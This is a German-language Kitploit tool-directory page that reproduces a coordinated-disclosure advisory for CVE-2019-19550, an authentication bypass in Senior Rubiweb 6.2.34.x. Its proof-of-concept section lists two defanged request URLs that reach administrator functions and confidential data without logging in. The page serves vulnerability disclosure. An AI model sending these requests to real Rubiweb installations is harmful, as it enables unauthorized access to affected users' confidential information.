Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/underprotection/cve-2019-19550
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubunderprotection/cve-2019-19550

CVE-2019-19550

Repository anzeigen
2vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-19550


[Beschreibung]

Die Umgehung der Remote-Authentifizierung in Senior Rubiweb 6.2.34.28 und 6.2.34.37 ermöglicht Admin-Zugriff auf vertrauliche Informationen betroffener Benutzer, die anfällige Versionen verwenden. Der Angreifer muss lediglich die korrekte URL angeben.


[Wichtige Daten]

  • Ankündigung (an den Anbieter): 2019-12-02
  • Datum der öffentlichen Offenlegung: 2020-01-30

[Schwachstellentyp]

Fehlerhafte Zugriffskontrolle


[Produktanbieter]

Senior


[Betroffene Produktcodebasis]

  • Rubiweb - 6.2.34.37
  • Rubiweb - 6.2.34.28
  • Andere Versionen können betroffen sein, insbesondere aus derselben Familie (noch nicht getestet)

[Betroffene Komponente]

Rubiweb


[Angriffsart]

Remote


[Auswirkung Informationsoffenlegung]

Ja


[Angriffsvektoren]

Der Zugriff auf vertrauliche Informationen ist ohne besondere Anforderungen öffentlich verfügbar (nur der korrekte URI)


[Hat der Anbieter die Schwachstelle bestätigt oder anerkannt?]

Ja


[PoC - Proof of Concept]

  1. Versuchen Sie einfach, sich mit dem authentifizierten Portal zu verbinden, um die Existenz und Version des betroffenen Produkts zu bestätigen:
    • hXXp://subdomain.customer.tld:8080/rubiweb/
  2. Rufen Sie die anfällige Seite auf (Admin ohne Authentifizierung):
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU

[Entdecker]

Mauricio Santos (R&D UnderProtection) und Hesron Hori (R&D UnderProtection)


[Dank an]

Senior – Information-Security-Team des Anbieters, das an einer koordinierten Offenlegung mitgewirkt hat


[Referenz]

  • https://www.underprotection.com.br
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm#central-de-configuracao/CfgWebApplicationsForm.htm%23CfgWebApplicationsForm_edtUserName
Tool herunterladen